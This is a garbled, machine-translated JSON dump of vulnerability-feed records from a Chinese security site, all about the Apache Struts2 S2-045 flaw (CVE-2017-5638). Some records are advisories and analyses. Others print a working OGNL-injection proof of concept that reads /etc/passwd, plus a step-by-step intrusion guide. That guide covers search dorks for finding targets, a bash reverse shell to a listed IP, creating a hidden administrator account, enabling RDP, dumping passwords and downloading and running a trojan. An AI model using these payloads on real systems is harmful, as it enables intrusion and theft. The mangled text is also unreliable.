"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-07T00:00:00", "id": "MYHACK58:62201786819", "href": "http://www.myhack58.com/Article/html/3/62/2017/86819.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:02", "description": "Recently, the national information security vulnerabilities library CNNVD received on the Apache Struts2 \uff08S2-045 remote code execution vulnerability CNNVD-201703-152 the case of the message send. Because the vulnerability affects a wide range of hazard level high, the national information security vulnerabilities library CNNVD for the tracking analysis, the situation is as follows: \nA, vulnerability introduction\nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework, mainly to provide two versions of the frame product: Struts 1 and Struts 2 of. \nApacheStruts 2.3.5 \u2013 2.3. 31 version and 2. 5 \u2013 2.5.10 version there is a remote code execution vulnerability CNNVD-201703-152, CVE-2017-5638 it. The vulnerability is due to the upload functionality of the exception handling function does not properly handle user input error information. Lead to a remote attacker by sending malicious packets that exploit the vulnerability in the affected on the server execute arbitrary commands. \nSecond, the vulnerability to hazards\nAn attacker can send malformed HTTP packet to exploit the vulnerability in the affected server to perform system commands, and further can completely control the server, causing a denial of service, data leakage, website creation tampering and other effects. Since the exploit without any pre-conditions such as open dmi, debug, and other functions, and enable any plugins, and therefore vulnerability to harm is more serious. \nThird, the repair measures\nCurrently, the Apache official has been directed to the vulnerabilities released a security announcement. Please the affected users to check whether or not affected by the vulnerability. \nSelf-examination manner\n\u7528\u6237 \u53ef \u67e5\u770b web \u76ee\u5f55 \u4e0b /WEB-INF/lib/ \u76ee\u5f55 \u4e0b \u7684 struts-core.x.x.jar file, if the version in Struts2. 3. 5 to Struts2. 3. 31 and Struts2. 5 to Struts2. 5. 10 between the presence of vulnerabilities. \nUpgrade repair\nAffected users can upgrade to version to Apache Struts 2.3.32 or Apache Struts 2.5.10.1 to eliminate the vulnerability. \nTemporary relief\nAs the user inconvenient to upgrade, may take the following temporary solution: \nl delete commons-fileupload-x. x. x. the jar file will cause the upload function is not available. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "About Apache Struts2\uff08S2-045\uff09vulnerability briefings-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784024", "href": "http://www.myhack58.com/Article/html/3/62/2017/84024.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-10T13:31:12", "description": "0\u00d71 Overview \nMany business websites use the Apache open source project to build a http server, which is most of the use of the Apache sub-project of Struts in. But since the Apache Struts2 Product code there are more risks, beginning in 2007, Struts2 will frequently broke multiple high-risk vulnerabilities. \nFrom the Apache official data, from 2007 to 2018 total published number S2-001 to S2-056 total of 56 vulnerabilities, of which only a remote code execution vulnerability Remote Code Execution on a 9. \n! [](/Article/UploadPic/2018-7/2018710164555841. png? www. myhack58. com) \n2017 3 months was reported out of the S2-045\uff08CVE-2017-5638 high-risk vulnerabilities, based on Jakarta Multipart parser implementation file upload may lead to an RCE, the impact of the range of the Struts 2.3.5 \u2013 Struts 2.3.31, as well as the Struts 2.5 \u2013 Struts 2.5.10 version, persists to be utilized for an attack. \n2018 year 4 months Tencent Yu see Threat Intelligence Center had been monitoring the hacker group exploit this vulnerability bulk of the invasion[the web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)implantation mining Trojan\uff08for more details, see the enterprise not fix Apache Struts 2 vulnerability-induced[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)is the bulk of the invasion article, the recent Royal to see the Threat Intelligence Center is again monitored a similar attack. \nThis attack, hackers use attack tools WinStr045 detecting the presence on the network vulnerability[web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), found that the presence of vulnerability of the machine through a remote execution of various types of instruction provide the right to, create, account, system information gathering, and then will be used to download the Trojan mas. exe the implant, then the use of mas. exe this Trojan Downloader from the plurality of C&C;address to download more Trojans: the \u5229\u7528\u63d0\u6743\u6728\u9a6co3/o6.exe and \u6316\u77ff\u6728\u9a6cnetxmr4.0.exe the. \nSince the bitcoin mining Trojan netxmr the decryption code after the module name\u201ckoi\u201dis loaded, therefore, Tencent Yu see Threat Intelligence Center will be named for KoiMiner it. Interestingly, intruders to ensure your mining success, it will check the system processes, CPU resource consumption, and if CPU usage exceeds 40%, it will be the end of the Run, will save the system resources for the mining of. \nAccording to the code traceability analysis, Tencent Yu see Threat Intelligence Center researchers believe that this KoiMiner series mining Trojan is probably some hacker forums, underground mining organizations to share in the community more people cooperation of the\u201cpractice\u201dworks. \n! [](/Article/UploadPic/2018-7/2018710164555994. png? www. myhack58. com) \nAttack process \nNote: Struts is based on MVC design pattern Web application framework, the user use of the framework can be business logic code from the presentation layer clearly separated, so as to focus on the business logic and the mapping relationship between the configuration file. Struts2 is Struts and WebWork combination, a combination of Struts and WebWork advantages, the use of interceptor mechanisms to process the user's request, so that business logic can with ServletAPI completely out of the opening. \n0\u00d72 a detailed analysis of the \n0 x 2.1 intrusion \nThe detection of the target system whether the presence of S2-045 vulnerability \n! [](/Article/UploadPic/2018-7/2018710164555176. png? www. myhack58. com) \nThe presence of the vulnerability of the system to attack \n! [](/Article/UploadPic/2018-7/2018710164555748. png? www. myhack58. com) \nInvasion tool for the selection of osmotic command \n! [](/Article/UploadPic/2018-7/2018710164555749. png? www. myhack58. com) \nThe invasion can be selected when execution of the command can also be self-defined,choose the command Windows, linux, penetration of commonly used commands, including viewing system version information, network connection status, port open status and add to the system with administrator privileges to the new user, open the remote connection service and other operations. \n! [](/Article/UploadPic/2018-7/2018710164555928. png? www. myhack58. com) \nThrough the directory view command to confirm C:\\Windows\\Help directory and C:\\ProgramData whether the directory has been implanted Trojan, if not then the mas. exe Trojan infection. The time of implantation to first create the C#code to text mas. cs, \u7136\u540e\u4f7f\u7528.NET\u7a0b\u5e8f\u5c06\u5176\u7f16\u8bd1\u4e3a\u53ef\u6267\u884c\u6587\u4ef6mas.exe the. \nFirst execute the command to create a mas. cs and write The for download code. \n! [](/Article/UploadPic/2018-7/2018710164555437. png? www. myhack58. com) \n\u7136\u540e\u6267\u884c\u547d\u4ee4\u5c06mas.cs\u901a\u8fc7.NET\u7a0b\u5e8f\u7f16\u8bd1\u4e3amas.exe the. \n! [](/Article/UploadPic/2018-7/2018710164555672. png? www. myhack58. com) \nCommand in the use of mas. exe download mining Trojan netxmr4. To 0. \n! [](/Article/UploadPic/2018-7/2018710164555433. png? www. myhack58. com) \nPart of the attack objectives are as follows: \n! [](/Article/UploadPic/2018-7/2018710164555651. jpg? www. myhack58. com) \nImplantation of mas. the exe size is only 4k,is stored in the directory ProgramData. From Yu see Threat Intelligence Center monitoring and recording can be seen, mas.exe\u4ece\u591a\u4e2aC2\u5730\u5740\u4e0b\u8f7d\u4e86netxmr4.exe(mining Trojan), the o3.exe/o6.exe(providing the right to Trojans)and other Trojans. \n! [](/Article/UploadPic/2018-7/2018710164555713. png? www. myhack58. com)\n\n**[1] [[2]](<90758_2.htm>) [[3]](<90758_3.htm>) [[4]](<90758_4.htm>) [next](<90758_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-07-10T00:00:00", "type": "myhack58", "title": "Apache Struts2 high-risk vulnerabilities cause the Enterprise Server is the invasion mounted KoiMiner mining Trojan-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-07-10T00:00:00", "id": "MYHACK58:62201890758", "href": "http://www.myhack58.com/Article/html/3/62/2018/90758.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:04", "description": "! [](/Article/UploadPic/2017-3/201737152244987. png? www. myhack58. com) \nFreeBuf last exposure of the Struts 2 vulnerability is already more than six months ago. This vulnerability is a RCE remote code execution vulnerability. Simple to say, based on Jakarta Multipart resolver for file upload, exploit the vulnerability for remote code execution. The vulnerability by the constant information Nike Zheng reported. \nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework. \nVulnerability number\nCVE-2017-5638 \nVulnerability description\nThe Struts use the Jakarta parsing file upload request packet properly, when the remote attacker would construct a malicious Content-Type that could lead to remote command execution. \nIn fact in default. properties file, struts. multipart. parser of values there are two options, namely jakarta and pell in the original actually there is a third option cos it. Wherein the jakarta parser is the Struts 2 framework of the standard components. By default, jakarta is enabled, so the vulnerability of the seriousness of the need to get to grips with it. \nThe scope of the impact\nThe Struts 2.3.5 \u2013 Struts 2.3.31 \nThe Struts 2.5 \u2013 Struts 2.5.10 \nSolution\nIf you are using based on the Jakarta file upload Multipart resolver, please upgrade to Apache Struts 2.3. 32 or 2. 5. 10. 1 version; or you can switch to a different implementation of file upload Multipart resolver. \nVulnerability PoC \n#! /usr/bin/env python \n# encoding:utf-8 \nimport urllib2 \nimport sys \nfrom poster. encode import multipart_encode \nfrom poster. streaminghttp import register_openers \nheader1 ={ \n\"Host\":\"alumnus. shu. edu. cn\", \n\"Connection\":\"keep-alive\", \n\"Refer\":\"alumnus. shu. edu. cn\", \n\"Accept\":\"*/*\", \n\"X-Requested-With\":\"XMLHttpRequest\", \n\"Accept-Encoding\":\"deflate\", \n\"Accept-Language\":\"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4\", \n} \ndef poc(): \nregister_openers() \ndatagen, headers = multipart_encode({\"image1\": open(\"tmp.txt\", \"rb\")}) \nheader[\"User-Agent\"]=\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\" \nheader[\"Content-Type\"]=\"'%{(#nike,='multipart/form-data'). \n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). \n(#_memberAccess? (#_memberAccess=#dm): \n((#container=#context['com. opensymphony. xwork2. ActionContext. container']). \n(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). \n(#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). \n(#context. setMemberAccess(#dm)))). (#cmd='cat /etc/passwd'). \n(#iswin=(@java.lang.System@getProperty('os. name'). toLowerCase(). contains('win'))). \n(#cmds=(#iswin? {'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). \n(#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). \n(#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). \ngetOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). \n(#ros. flush())}\"' \nrequest = urllib2. Request(str(sys. argv[1]),datagen,headers=header) \nresponse = urllib2. urlopen(request) \nprint the response. read() \n\npoc() \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "Apache Struts2 exposure arbitrary code execution vulnerability (S2-045,CVE-2017-5638)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784026", "href": "http://www.myhack58.com/Article/html/3/62/2017/84026.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-08T11:52:28", "description": "1.1 CVE-2017-5638 vulnerability profile\nApache Struts 2 is the world's most popular JavaWeb Server framework. However, in Struts 2 found that the presence of high-risk security vulnerability, CVE-2017-5638,S02-45,and the vulnerability impact to: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts2. 5. 10 \nVulnerability ID: CVE-2017-5638 \nVulnerability rating: HIGH \nVulnerability name: S2-045: Struts 2 remote code execution vulnerability\nVulnerability impact: based on the JakartaMultipart the parser implementation file upload when possible RCE \nAffected version: Struts 2.3.5-Struts 2.3.31 \nThe Struts 2.5-Struts 2.5.10 \nRepair solutions: \nUpgrade to Struts2. 3. 32 or the Struts 2.5.10.1 \nStruts2. 3. 32 download address: \nhttps://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32 \nStruts2. 5. 10. 1 Download: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1 \nThe vulnerability principle: Struts2 default parse the uploaded file's Content-Type header, there is a problem. In the Parse error case, the error information in the OGNL code. \n1.2 hazard assessment\nAfter the actual test, as long as the vulnerability exists for windows and linux are Server Permissions. Great harm, to be sure for many people tonight is a sleepless night. \n1. 3 vulnerabilities in the actual use of 1. 3. 1 Ready to work\n1\uff0e Get ready for a jsp webshell, the Save on the site, for example, may be 1. txt and other text file, for network download. \n2\uff0e Ready to have a separate IP of the server, \u5728\u4e0a\u9762\u6709nc.exe the. \n3\uff0e Prepare python environment. \nGeneral use python2. 7. 13 version, download address: https://www.python.org/downloads/release/python-2713/, according to the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)version of the Select the installation, after the installation is complete first run will error, you need to install a module, shown in Figure 1. Need to install the poster. the encode module download address: https://pypi. python. org/pypi/poster/, the \u7136\u540e \u5230 \u8be5 \u76ee\u5f55 \u6267\u884c pythonsetup.py install, to install. Note that in python if you do not set system variables, you'll need to strip the full path to execute. For example: \nC:\\Python27\\python.exeC:\\Python27\\poster-0.8.1\\setup.py install \n! [](/Article/UploadPic/2017-3/20173818228916. jpg? www. myhack58. com) \nFigure 1 The Missing poster. the encode module \n4\uff0e Get a variety of action page \n\uff081\uff09by zoomeye to get a variety of action page to search the index. action, login. action, info. action and the like. \n\uff082\uff09Baidu aunt law\ninurl:index. actionsite:edu. cn \ninurl:index. actionsite:gov. cn \ninurl:index. actionsite:com. cn \nNote: don't vandalize, and now the network security method very good it!!! \n1.3.2 modify the poc exploit code\n1. For the linux version of the modified whoami values: bash-i>& /dev/tcp/122.115.47.39/4433 0>&1 \nDescription of 122. 115. 47. 39 for a rebound the Monitoring Server IP, port 4433, the \u7136\u540e \u5c06 \u6587\u4ef6 \u4fdd\u5b58 \u4e3a poclinux.py as shown in Figure 2. Also there can be some other common commands: id, whomai, cat /etc/passwd, cat/etc/shadow, etc. You can modify the corresponding parameters and keep a different name. \n! [](/Article/UploadPic/2017-3/20173818228744. jpg? www. myhack58. com) \nFigure 2 modify the linux poc exploit code\n2. Corresponding Windows Server, modify the whomai value: \nnet user antian365$ Wsantian365!*/ add \nnet localgroup administratorsantian365$ /add \n\u5206\u522b \u5c06 poc \u6587\u4ef6 \u4fdd\u5b58 \u4e3a pocwin1.py and pocwin2.py as shown in Figure 3. \n! [](/Article/UploadPic/2017-3/20173818228139. jpg? www. myhack58. com) \nFigure 3 modify the windows under the use of the code\n1.3.3 under Windows fast implement penetration\n1. Each other to open up 3389 \n\uff081\uff09scanning each other whether to open the 3389, open a, respectively, to execute: \npocwin1.py http://www.myhack58.com/index.action \npocwin2.py http://www.myhack58.com/index.action \nIf the other loopholes, then it will directly add a user\u201cantian365$\u201d, password\u201cWsantian365!*\u201d, the Server to open the 3389, sign up and then download wce64, directly wce64 \u2013w to get the current login password, be sure to use administrator rights to execute. \n\uff082\uff09directly on 3389 \nIn the parameters were modified three times, execute the following code three times, you can open 3389. \nwmic /namespace:\\\\\\root\\cimv2\\terminalservices pathwin32_terminalservicesetting where (__CLASS != \"\") callsetallowtsconnections 1 \nwmic/namespace:\\\\\\root\\cimv2\\terminalservices path win32_tsgeneralsetting where(TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 \nreg add\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f \n3389 is open on the condition that the other party is independent of the IP, if it is within the network IP the case of the second method. \n2. The Trojan executes the law\n\uff081\uff09Download the Trojan\nFirst you need to prepare a Trojan program, you need to through win2008. Then modify the win. py in the whoami parameters: \nGermany /transfer myjob1/download /priority normal http://www.myhack58.com/ma.exe c:\\windows\\temp\\ma.exe \nma. exe save in www. myhack58. com web site root directory, it will download directly to the other party c:\\windows\\temp directory. \n\uff082\uff09the execution of the Trojan, to modify the poc in the whoami parameters for the ma. exe to the true path and the address, as follows. Run save after the poc is in the original implementation. \nc:\\windows\\temp\\ma.exe \n1.3. 4Linux under the rapid penetration of the ideas\n1. On a standalone server to perform monitoring, required in the independent IP on the server, execute\u201cnc \u2013vv\u2013l \u2013p 4433\u201d, you can perform the connection about this IP the 4433 port. For example, http://www. myhack58. com:4433, if the listening port has data, it indicates the normal, otherwise check the firewall rules. \n2. Perform poc \n\n\n**[1] [[2]](<84086_2.htm>) [[3]](<84086_3.htm>) [next](<84086_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-08T00:00:00", "type": "myhack58", "title": "How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-08T00:00:00", "id": "MYHACK58:62201784086", "href": "http://www.myhack58.com/Article/html/3/62/2017/84086.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-16T03:17:43", "description": "Author: janes(know Chong Yu 404 laboratory)\n\nDate: 2017-03-15\n\n## Background description\n\nStruts2 official to GMT 2017 3 December 6, 10pm published Struts2 there is a remote code execution vulnerability vulnerability number S2-045, CVE number: CVE-2017-5638, and rated as high-risk vulnerabilities. Because the vulnerability affects a wide range of\uff08Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10, the vulnerability degree of harm is severe, you can directly access the application system of the server where the control limit, and 3 on 7 May in the morning on the Internet on the outflow of the vulnerability of the PoC and Exp,so, S2-045 vulnerability in the Internet on the impact of rapid expansion, by the Internet companies and the government attach great importance. From vulnerability announcement to now(3.6-3.15)has been more than a week, so take this opportunity to analyze S2-045 in the social media Twitter and on Sina Weibo heat distribution.\n\n## Data acquisition\n\nIf you want to analyze Twitter and on Sina Weibo, S2-045 vulnerability of the heat distribution, then you need to get Twiiter and Facebook on the data, with the data speak. So they use\u201cselenium+phantomjs\u201dgo crawling the data via Twitter and Sina Weibo web page to the search interface, respectively, search for the keyword\u201cs2-045\u201dand\u201cCVE-2017-5638\u201d, then the search results go to the weight and finishing, taking to Twitter and Facebook, the time display of the time zone inconsistencies, using the same crawl page timestamp and then converted to the local time of the way of a unified time zone issues, the crawling data in the time to 2017 year 3 month 14 days afternoon 18 when, the results as shown below.\n\n* Twitter! [](/Article/UploadPic/2017-3/2017316104811455. png)\n\n* Sina Weibo! [](/Article/UploadPic/2017-3/2017316104812512. png)\n\n## Heat analysis\n\nStatistics daily S2-045 vulnerability in the Twitter and on Sina Weibo, the number of occurrences, to obtain the following table, Twitter, the CCP appears 73 times, Sina Weibo, the CCP appears 45 times. On the dissemination of the amount of data, S2-045 vulnerability of the data amount is not large, this reflected from the side of the security vulnerabilities of the information and not by the majority of the people of concern, mainly in the security circle propagation.\n\n| Social media | 3 December 7 | 3 8 March | 3 April 9 | 3 October 10 | 3 11 March | 3 November 12 | 3 13 February | 3 March 14 \n---|---|---|---|---|---|---|---|--- \nTwitter| 16 | 3 | 7 | 15 | 6 | 11 | 15 | 0 \nSina Weibo| 23 | 8 | 7 | 3 | 0 | 0 | 1 | 3 \n\n! [](/Article/UploadPic/2017-3/2017316104812815. png)\n\nUsing the above table of data, production of graphics, get as on the heat distribution from the figure it can be seen:\n\n* 3 month 6 day before the announcement of the S2-045 vulnerability, 3 on 7, on Twitter and on Sina Weibo, the occurrence of the outbreak spread, which is likely to and vulnerabilities of the PoC and Exp in 3 month 7 days you on the Internet widely spread about;\n* Sina Weibo, S2-045 vulnerability to the heat distribution of the overall downward state, in the peak in 3 month 7 days, while Twitter as a whole was undulating trend, 3 on 7th, 3 on 10th and 3 on 13 September are peak;\n* Sina Weibo and Twitter for both the overall potential is not the same, and in 3 on the 7th, Sina Weibo and Twitter are data of the highest peak, but Sina Weibo, the amount of data than Twitter.\n\nThere may be several reasons could explain this phenomenon:\n\n* S2-045 vulnerability is the Chinese found that, 3 on 6 September evening, the official publication of the vulnerability, 3 on 7 on the morning of the vulnerabilities of the PoC and Exp in domestic Internet flow out, by domestic security company-wide attention, this also would explain the 3 on 7 The New Wave of microblogging amount of data over the Twitter phenomenon;\n* Due to the S2-045 vulnerability to serious harm, and quickly spread out of PoC and Exp, and therefore, 3 on 7 August, the domestic security companies will quickly start the emergency response, other Internet companies also in self-examination and patch S2-045 vulnerability, with the vulnerability of repair, on Sina Weibo, the attention naturally reduces, the overall will show a downward trend;\n* Twitter user distribution of a wide range of countries or regions affected by the S2-045 the influence is different, therefore trends appear UPS and downs.\n\n3 December 7, Sina Weibo and Twitter are data peak, then the 3 on 7, data, time period distribution mapping as follows, As can be seen, the morning 8 When before, Sina Weibo and Twitter, the amount of data is 0, 8 to 10 period rooms began to appear, it seems, and working hours more in line with the, The and the data the peak occurred mainly in the afternoon 14 to 18 between, perhaps this is because PoC and Exp on the Internet widely spread, caused the Internet began to be mass attack(reference [HackerNews Struts2 vulnerability disclosure 24 hour](<http://hackernews.cc/archives/7371>)) to.\n\n! [](/Article/UploadPic/2017-3/2017316104812327. png)\n\nFinally, look at Twitter and Sina Weibo on on S2-045 vulnerability in the first message what time and by whom issued, and the results are shown in the following table. Twitter and Sina microblogging issued the first message is not the same person, but the transmission time difference is not much, visible at home and abroad to exploit the perceptual capacity is relatively quite.\n\nIbid., the times are Beijing time, according to the unix time stamp conversion.\n\nSocial media | time | nickname | real identity\n---|---|---|--- \nTwitter | 2017-03-07 09:29:00 | @amannk | \nSina Weibo | 2017-03-07 09:44:29 | gnaw0725 | nsfocus Brand Manager Wang Yang\n\n**[1] [[2]](<84379_2.htm>) [next](<84379_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "myhack58", "title": "The Struts S2-045 vulnerability heat analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "MYHACK58:62201784379", "href": "http://www.myhack58.com/Article/html/3/62/2017/84379.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-30T00:37:24", "description": "Through this article, we mainly learn how Apache Struts to achieve OGNL injection. Our examples will be set forth in the Struts of the two critical vulnerabilities: CVE-2017-5638\uff08Equifax information disclosure and CVE-2018-11776\u3002 \nApache Struts is a free open source framework for creating modern Java Web applications. Apache Struts has many serious vulnerabilities, one of its characteristics is to support OGNL object graph navigation language, which is also many loopholes is the main reason. \nOne vulnerability, CVE-2017-5638 directly leads to the 2017 Equifax information leakage, exposure to more than 1. 45 million US citizens personal information. Although the company's annual revenue more than 30 billion dollars, but they still did not escape the Apache Struts MVC framework of a known vulnerability attack. \nThis paper mainly introduces the Apache Struts, and then will guide us how to modify a simple application, the use of OGNL and achieve exploits. Next, we will study in depth the platform on a number of Public Exploit way, and try to use OGNL injection vulnerability. \nAlthough Java developers are familiar with Apache Struts, but the security community often does not do however, which is why we wrote this article for the reason. \nGetting started \nRunning a vulnerable Struts application need to install Apache Tomcat [Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>a). The package of the latest version can be downloaded here as a ZIP. The binary file decompress to a location of your choice we use/var/tomcat, and continues: \ncd /var/tomcat/bin # go to the unzipped folder \nchmod +x *. sh # set the script to executable file \n./ startup.sh # run the startup script \nOur visit to http://localhost:8080/, and check whether the site running. \nAfter the confirmation, we are ready to download the old version of the Apache Struts framework, which is vulnerable to our upcoming demo of the vulnerability attack. This page provides to meet our needs 2. 3. 30 version The Struts in. \nIn the extract compressed content, we should be in the/apps position seen under struts2-showcase. war file. This is one use of the Struts compiled and ready to deploy demo application. Just need the WAR file is copied to/var/tomcat/webapps, and access http://localhost:8080/struts2-showcase/showcase. action confirm whether it is valid. \n[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)the basics \nIf you have a good grasp of the Java Web applications related to simple concepts such as Servlets, then you would have been leading. If you are new to the Java Servlet knows nothing about, it can be understood simply as a component, its purpose is to create for in the[Web 